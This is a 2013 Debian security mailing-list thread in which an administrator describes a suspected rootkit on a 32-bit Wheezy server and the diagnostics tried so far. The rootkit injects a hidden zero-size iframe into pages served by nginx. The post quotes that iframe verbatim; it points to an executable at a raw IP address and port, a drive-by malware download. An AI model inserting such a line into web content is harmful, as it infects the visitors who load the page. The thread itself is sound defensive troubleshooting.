On Thu, Sep 12, 2013 at 09:13:46AM +0900, Joel Rees wrote: > On Thu, Sep 12, 2013 at 7:48 AM, E Frank Ball III <fra...@efball.com> wrote: > > Last fall there was a debian 64-bit / nginx rootkit going around, > > now I've been hit with what sounds similar but on 32-bit wheezy. > > > > All files served by nginx have this line inserted at the top: > > > > <iframe src= http://122.226.137.123:1111/yixi.exe width=0 > > height=0></iframe> > > > > I tar'd up /lib/modules/3.2.0-4-686-pae/kernel, copied it to another > > Debian Wheezy i386 machine in a safe environment and did a diff -r. No > > difference. > > > > No ismod line in /etc/rc.local > > > > I haven't been able to find anything. Googling doesn't show anything > > similar for debian wheezy i386, only sqeeze 64-bit. > > > > I was using nginx-light from dotdeb.org. I uninstalled nginx and tried > > the nginx-light from debian wheezy but it made no difference.
> > Just out of curiosity, did you back up nginx and check it as well? > > -- > Joel Rees No, I just uninstalled nginx from dotdeb and installed from Debian. The webpages are all static and remain unchanged, the nginx config files are OK. The new line is added by some process I can't find. The lynx webrowser shows this as the first line of the webpages: IFRAME: http://122.226.137.123:1111/yixi.exe It also appears in downloads using wget. "view source" in firefox or chrome show nothing amiss. It only appears on IPv4, not IPv6. I do not have php installed. The http header is completely different: curl -I shows this: HTTP/1.1 200 OK Content-Type: text/html; charset=en_US.UTF-8 Content-Length: 3634 When it should look more like this: HTTP/1.1 200 OK Server: nginx/1.4.2 Date: Wed, 11 Sep 2013 23:39:48 GMT Content-Type: text/html; charset=en_US.UTF-8 Content-Length: 3291 Last-Modified: Thu, 24 Jan 2013 21:30:28 GMT Connection: keep-alive Vary: Accept-Encoding ETag: "5101a7f4-cdb" Accept-Ranges: bytes I installed chkrootkit, rkhunter, unhide.rb and they found nothing. E Frank Ball fra...@efball.com -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20130912003916.gh30...@kamajii.efball.com